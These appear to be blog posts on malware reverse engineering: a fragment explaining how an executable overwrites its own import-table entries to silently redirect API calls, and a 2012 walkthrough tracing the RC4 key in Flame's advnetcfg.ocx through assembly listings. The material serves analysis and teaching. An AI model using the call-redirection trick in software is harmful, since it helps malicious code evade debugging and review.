Basically, it changes the protection of the memory containing the import addresses, using the VirtualProtect API; then it overwrites the FirstThunk entry, related to the RegisterClassExW and CreateWindowExW APIs, with a malicious offset.
In this way, every time one of these APIs is called it won't be executed and, instead, the code located at the malicious offset will be run. Even debugging the code, if we don't step into the calls, nothing will suggest that the code is being hijacked.

As we can see the ones above seem to be normal, legitimate, calls, but they are really hijacked to the malicious routines. And here is the trick in action in the debugger:

Note that this is not API hooking, but only a simple trick that works in the executable itself: it's not the API code being overwritten, it is the FirstThunk of the malicious executable.
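
The effect can be pictured with a small Python analogy, in which a dictionary of callables plays the role of the import address table. It is only a model of the idea (a call that goes through a table can be redirected by overwriting the table entry, without touching the code of the callee); every name in it is hypothetical.

```python
def register_class_ex_w() -> str:
    return "real RegisterClassExW"


def create_window_ex_w() -> str:
    return "real CreateWindowExW"


def bad_func1() -> str:
    return "BadFunc1"


def bad_func2() -> str:
    return "BadFunc2"


# Toy "import address table": name -> address of the code to run
iat = {
    "RegisterClassExW": register_class_ex_w,
    "CreateWindowExW": create_window_ex_w,
}


def call_import(name: str) -> str:
    # Like "call ds:RegisterClassExW": the target is read from the table
    return iat[name]()


def hijack(table: dict, replacements: dict) -> None:
    # Overwrite only the entries that exist, as the loop over the import names does
    for name, target in replacements.items():
        if name in table:
            table[name] = target


hijack(iat, {"RegisterClassExW": bad_func1, "CreateWindowExW": bad_func2})
```

After hijack() runs, call_import("RegisterClassExW") still looks like an ordinary call at the call site, but it runs bad_func1, while register_class_ex_w itself is unchanged.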

What can I say... It's not a very advanced deception trick, but a curious one at least: come on guys, you can do better!

Monday, June 11, 2012

Why Flame is a pain to analyze - a look at its intricate compilation style.

Introduction

This post is about some peculiarities of the assembly code of Flame, the malware infiltrating Iranian computers. Note that I'm not going to give you any additional details or new findings about its analysis; if you are interested in this kind of stuff I suggest you read the report written by CrySyS, which is by far the most comprehensive description available of its different components.

Aside from that, it should be noted that although the main functionalities of Flame have been identified, there's still a lot of undocumented code. So I hope that, for those of you who want to perform their own analysis, it will be helpful to understand more about its compilation style, and that's why I'm writing these little notes.

In order to do that I decided to discuss a specific routine in the "advnetcfg.ocx" file: the RC4 encryption routine. In particular, I focused on the attempt to retrieve the key.
Although I'm not the first one to find it, as it appears also in the CrySyS report cited above (without describing the procedure), the scope of this post is to show you how a standard task like that is made intricate and time-consuming by the compilation style.

This is only an example to highlight this kind of structured code, as you will find it all over the malware. Of course, this isn't the only peculiarity that makes its code more difficult to understand: maybe there will be a sequel to continue this discussion.

First, we will describe how to deal with the RC4 algorithm in order to identify which parameter is used for the key. Even knowing that, it won't be enough to find its content directly, and we will have to go through some intricate code to finally reveal its value.

Let's get it started.


Analyzing RC4

Taking a look at the code, we notice the following loop:

.text:1002598F mov [eax+ecx], al
.text:10025992 inc eax
.text:10025993 cmp eax, 100h
.text:10025998 jl short loc_1002598F

This is a typical sign of the RC4 algorithm, as it builds a 0x100-byte (256 decimal) array, which is the initial permutation box. Just compare it to one of the RC4 source codes available online (this, for instance), and look for the Assembly-C correspondence:

for (i = 0; i < 256; i++)
state->perm[i] = (u_char)i;


Then we can see another clear sign of RC4:

.text:1002599C   mov [ecx+100h], dl
.text:100259A2   mov [ecx+101h], dl


It obviously refers to:

state->index1 = 0;
state->index2 = 0;


Putting these lines together we get the RC4 "state" structure, which is set up by the "rc4_init" function. You can also notice that the "rc4_crypt" function appears in the lines that follow, probably because the code was just copied from a source similar to the one we are referring to.

We also know that the prototype of the "rc4_init" function is:

void rc4_init(struct rc4_state *const state, const u_char *key, int keylen);

But in the assembly code we see only two parameters:

.text:10025986 arg_0 = dword ptr 8
.text:10025986 arg_4 = dword ptr 0Ch

This is weird! It means that one of them is missing: why? For the moment let's just say that the answer is related to the intricate nature of the code that I will clarify later.

First let's look for the code that uses the key. In the C code we have:

j += state->perm[i] + key[i % keylen];


We are interested in finding an Assembly correspondence for the last addend:

.text:100259DA   idiv [ebp+arg_4]


This tells us that arg_4 is the key length. Moreover:

.text:100259DD   inc [ebp+var_8]
.text:100259E0 cmp [ebp+var_8], 100h
.text:100259E7 jl short loc_100259AF


So, var_8 in the Assembly code is the counter i in the C code, and to find the key we have to look for an Assembly instruction that reads one byte from memory. This consideration leads us to:

mov bl, [esi+edi]


We are indeed interested in edi that comes from arg_0:

.text:100259B2   mov edi, [ebp+arg_0]


that is... the key!
Well, here we are... we found the key... but are we done? Usually the answer would be "yes", but in this case there's more work to do and this is where the code becomes intricate.
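The Assembly-C correspondence worked out in this section can be sketched in Python. This is only a reconstruction under the assumption that the routine is plain RC4, with the state laid out as the listing suggests (256-byte permutation box, then the two indexes at offsets 100h and 101h). The key "Key" and the plaintext are a well-known public RC4 test vector, not Flame's key.

```python
# RC4 state laid out as in the listing: 256-byte permutation box,
# then index1 at offset 0x100 and index2 at offset 0x101.
PERM_SIZE = 0x100
INDEX1 = 0x100
INDEX2 = 0x101

def rc4_init(key):
    state = bytearray(PERM_SIZE + 2)
    for i in range(PERM_SIZE):          # mov [eax+ecx], al
        state[i] = i
    state[INDEX1] = 0                   # mov [ecx+100h], dl
    state[INDEX2] = 0                   # mov [ecx+101h], dl
    j = 0
    for i in range(PERM_SIZE):
        # key[i % keylen]: idiv by the key length leaves the remainder
        # that is used as the index into the key
        j = (j + state[i] + key[i % len(key)]) & 0xFF
        state[i], state[j] = state[j], state[i]
    return state

def rc4_crypt(state, data):
    out = bytearray()
    for byte in data:
        state[INDEX1] = (state[INDEX1] + 1) & 0xFF
        state[INDEX2] = (state[INDEX2] + state[state[INDEX1]]) & 0xFF
        a, b = state[INDEX1], state[INDEX2]
        state[a], state[b] = state[b], state[a]
        out.append(byte ^ state[(state[a] + state[b]) & 0xFF])
    return bytes(out)

# Public test vector only; the real key is what we are still looking for.
ciphertext = rc4_crypt(rc4_init(b"Key"), b"Plaintext")
roundtrip = rc4_crypt(rc4_init(b"Key"), ciphertext)
```

Since RC4 is symmetric, running the same routine with the same key over the ciphertext gives the plaintext back, which is why recovering the key is all we need.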


Tracking the key

Now we know that the key is passed to the "rc4_init" function as the first argument and we want to track it back to see its content. So, we follow the code using the Cross References and notice that eax corresponds to arg_0, as it is pushed right before the call to "rc4_init":

.text:1000E69F call get_key_object
.text:1000E6A4 push eax
.text:1000E6A5 lea ecx, [esi+4]
.text:1000E6A8 call rc4_init

What about eax?

It comes from the "get_key_object" call, from which we get:

.text:1000C537   mov eax, [ecx+4]
.text:1000C53A   mov eax, [eax+0Ch]
.text:1000C53D   add eax, [ecx+8]
.text:1000C540   retn

A little remark: as a convention, the C++ "this" pointer is stored in the ecx register. If you are interested in reversing C++ applications you should read this paper as a starting point. More info about the "this" pointer can be found here.

Basically, the code above reads a pointer and then adds something to it, leading to the final pointer to the key. In particular, you can picture the whole thing as a "memory buffer" object that contains a pointer to the data and an index to access it.
Something like this:


          this
    +---------------+
 00 |      ...      |              Obj_data
    +---------------+          +---------------+
 04 | ptr Obj_data  |   --->   |      ...      | 00
    +---------------+          +---------------+
 08 |     Index     |          |      ...      | 04
    +---------------+          +---------------+
    |      ...      |          |      ...      | 08            Key
                               +---------------+               +--+
                               | ptr byte Key  | 0C   --->     |  | 0
                               +---------------+               +--+
                               |      ...      |               |  | 1
                                                               +--+
                                                               |..| 2
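The three instructions of "get_key_object" can be replayed over a fake flat memory to check our reading of the layout. This is just a sketch: the addresses, the index and the key bytes are all made up, and read_dword is a helper invented for the example.

```python
import struct

def read_dword(mem, addr):
    # Little-endian 32-bit read, like `mov eax, [addr]`.
    return struct.unpack_from("<I", mem, addr)[0]

def get_key_object(mem, this):
    eax = read_dword(mem, this + 4)       # mov eax, [ecx+4]   -> ptr Obj_data
    eax = read_dword(mem, eax + 0x0C)     # mov eax, [eax+0Ch] -> ptr byte Key
    eax = (eax + read_dword(mem, this + 8)) & 0xFFFFFFFF  # add eax, [ecx+8]
    return eax

# Hypothetical flat memory: every address and byte below is made up.
mem = bytearray(0x100)
THIS, OBJ_DATA, KEY = 0x10, 0x40, 0x80
struct.pack_into("<I", mem, THIS + 4, OBJ_DATA)    # ptr Obj_data
struct.pack_into("<I", mem, THIS + 8, 2)           # Index
struct.pack_into("<I", mem, OBJ_DATA + 0x0C, KEY)  # ptr byte Key
mem[KEY:KEY + 4] = b"\xAA\xBB\xCC\xDD"

ptr = get_key_object(mem, THIS)
```

With an index of 2 the returned pointer lands on the third byte of the fake key, so the return value is "pointer to the bytes, plus index", exactly as in the picture.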

Now we have to follow ecx before "get_key_object" is called, and we see:

.text:1000E69C   lea ecx, [ebp+var_20]


So, we want to investigate when "var_20" is filled with a value.

.text:1000E67F mov esi, ecx
.text:1000E681 push [ebp+arg0]
.text:1000E684 lea eax, [ebp+var_20]
.text:1000E687 lea ebx, [esi+108h]
.text:1000E68D push eax
.text:1000E68E call key_from_arg0?


From the code above we may think that the key is passed through arg0, but if we try to follow arg0 via Cross Reference we don't go very far:

.text:1000E5CE push 0
.text:1000E5D0 lea eax, [ebp+var_20]
.text:1000E5D3 push eax
.text:1000E5D4 xor ebx, ebx
.text:1000E5D6 call instantiate_object
.text:1000E5DB mov byte ptr [ebp+var_4], 2
.text:1000E5DF push eax
.text:1000E5E0 mov ecx, esi
.text:1000E5E2 call do_rc4


arg0 is the first parameter of the function we were in before following the Cross Reference; let's call it "do_rc4". So we have to follow eax, that is, the return value of the "instantiate_object" function. This call takes 0 and var_20 as its parameters and returns an empty object.

Dead end, indeed... or maybe not! Let's reconsider the parameters passed to the "key_from_arg0?" function: maybe the parameter we are interested in isn't passed via the stack, but via a register... Maybe the missing piece is the instruction:

.text:1000E687 lea ebx, [esi+108h]

and we have to follow esi+108h instead of arg0!

At the top of the "do_rc4" function we notice:

.text:1000E67F mov esi, ecx


So, esi+108h is passed to the "do_rc4" function, via the "this" pointer.

Now let's follow back the cross reference; if we scroll up the code we notice:

.text:1000E5B2 push [ebp+p_key_bytes]
.text:1000E5B5 mov ebx, [ebp+arg_8]
.text:1000E5B8 lea eax, [esi+108h]
.text:1000E5BE push eax
.text:1000E5BF mov dword ptr [esi], offset off_10073520
.text:1000E5C5 call instantiate_object


This totally makes sense! There is a second call to the "instantiate_object" function and this time its parameters are p_key_bytes and esi+108h. It makes us think that this function creates an object with the bytes of the key from p_key_bytes and puts its address in esi+108h.

Ok, here we go... Again! Recursive way to think: let's call "do_rc4_2" the function we are in and follow p_key_bytes via Cross Reference to see when it is filled.

.text:1000129A lea ecx, [ebp+58h]
.text:1000129D call get_key_object
.text:100012A2 push eax
.text:100012A3 lea eax, [ebp-1F4h]
.text:100012A9 push eax
.text:100012AA call do_rc4_2

"p_key_bytes" is the second parameter of "do_rc4_2" and to investigate its value we have to follow eax, that is... the return value of the "get_key_object" function we have already described. It reads an object from the address contained in ecx... that is... the one contained in ebp+58h! Really, really weird!
Why ebp+58h? Are there so many parameters on the stack?

In order to understand the situation properly, we have to go to the beginning of the function that calls "do_rc4_2":

.text:10001230 push ebp
.text:10001231 sub esp, 48h
.text:10001234 mov eax, offset sub_1006A3CF
.text:10001239 call __EH_prolog

To skip some boring calculations, let's just say that "__EH_prolog" sets the value of ebp to esp-4. So, after the execution of these instructions, the stack will look like this:

... [prolog][48h bytes][ebp][ret_addr][param_1][param_2] ...

So:

prolog + 48h + ebp + ret_addr + param_1 = 4h + 48h + 4h + 4h + 4h = 58h

It sounds good! It means that the code points to param_2.
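The same sum can be done mechanically by walking the layout and accumulating the sizes. This is a small sketch that takes the stack picture above at face value, assuming ebp points at the start of the first slot; frame_offsets and the slot names are invented for the example.

```python
def frame_offsets(slots):
    # slots: list of (name, size) pairs, lowest address first, with
    # ebp assumed to point at the start of the first slot.
    offsets, position = {}, 0
    for name, size in slots:
        offsets[name] = position
        position += size
    return offsets

layout = frame_offsets([
    ("prolog", 0x04),
    ("locals", 0x48),
    ("saved_ebp", 0x04),
    ("ret_addr", 0x04),
    ("param_1", 0x04),
    ("param_2", 0x04),   # size does not affect param_2's own offset
])
```

Here layout["param_2"] comes out as 58h, so lea ecx, [ebp+58h] does load the address of the second parameter.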

Once again... let's call the function we are in "go", and look for its second parameter via Cross Reference.

.text:10003254 sub esp, 14h
.text:10003257 mov eax, esp
.text:10003259 mov [ebp+78h], esp
.text:1000325C push eax
.text:1000325D mov ebx, [ebp+68h]
.text:10003260 call do_newcopy_addref
.text:10003265 mov byte ptr [ebp-4], 2
.text:10003269 push dword_10091C08
.text:1000326F mov byte ptr [ebp-4], 1
.text:10003273 call go

And here comes the problem... we are looking for the second parameter, but there's only one push! Don't panic.

Let's take a look at the code: first it reserves 14h bytes on the stack, using the sub esp, 14h instruction, and then it calls the "do_newcopy_addref" function, which copies something from the value stored at ebp+68h into those newly reserved 14h bytes (once again, the value at ebp+68h is passed via register, this time ebx!).

So, we have to re-figure out what the stack looks like:

... [prolog][48h bytes][ebp][ret_addr][param_1][14h bytes object] ...

Basically, param_2 is a 14h bytes object.

This is unusual, as normally the code would have passed a pointer to the object instead of the object itself. This also makes the code more difficult to analyze because, in this way, IDA cannot recognize the parameter anymore.

We are almost done: let's focus on ebp+68h and try to track it back!

.text:1000323E push dword ptr [ebp+78h]
.text:10003241 lea eax, [ebp+68h]
.text:10003244 push eax
.text:10003245 call sub_1000346A

The reasoning is always the same: we see a function with two parameters, one of which is ebp+68h; so, we can suppose that the other one, that is ebp+78h, points to the bytes of the key and the function instantiates an object by making a copy from the key itself.

Now, we have to follow ebp+78h. It reminds us of the weird parameter ebp+58h we saw before... So, again, we go to the beginning of the function and notice:

.text:100031FA push ebp
.text:100031FB sub esp, 6Ch
.text:100031FE mov eax, offset loc_1006ACBC
.text:10003203 call __EH_prolog

This time the stack will look like this:

... [prolog][6Ch bytes][ebp][ret_addr][param_1][param_2] ...

and

prolog + 6Ch + ebp + ret_addr = 4h + 6Ch + 4h + 4h = 78h

So, ebp+78h points to param_1.

Again, we go via Cross Reference to follow param_1 and see:

.text:100126FB push [ebp+arg_0]
.text:100126FE call sub_100031FA

arg0 is our target! Another first parameter to follow, another Cross Reference to see:

.text:100033BA push [ebp+arg_0]
.text:100033BD call sub_100126D5

But now we are in a very special function:

.text:100033A4 UpdateTBSList proc near

It is an exported function but, even knowing that, it doesn't let us retrieve the key, as it is not called from within the executable module itself...!

Here is a visual representation of the whole analysis we have done:

I hope this discussion has given you an idea of how much this kind of structured code can complicate things... although we went very deep into the code to track the key back, even at the end of our analysis we didn't find its value!

Are we close to it? Mmm... close enough at least :P

I'm not going to describe every single detail, but let's just think of the next logical step.

You may think about looking for the call to "UpdateTBSList" in the other components of Flame, but you won't find anything because the strings are encrypted! So, first you have to decrypt the strings and then you can look in every component of the malware to find where the export is called :)

But, even knowing that... once you have finally retrieved the key... what is it useful for? Was this time-consuming effort worth it?

Well, it definitely is but, to understand why, you should conduct further investigation... :) This "never ending task" makes us think of the direction malware analysis has been taking in recent years: a lot of effort, a lot of patience and a lot of dedication are required to perform even a small analysis like this one!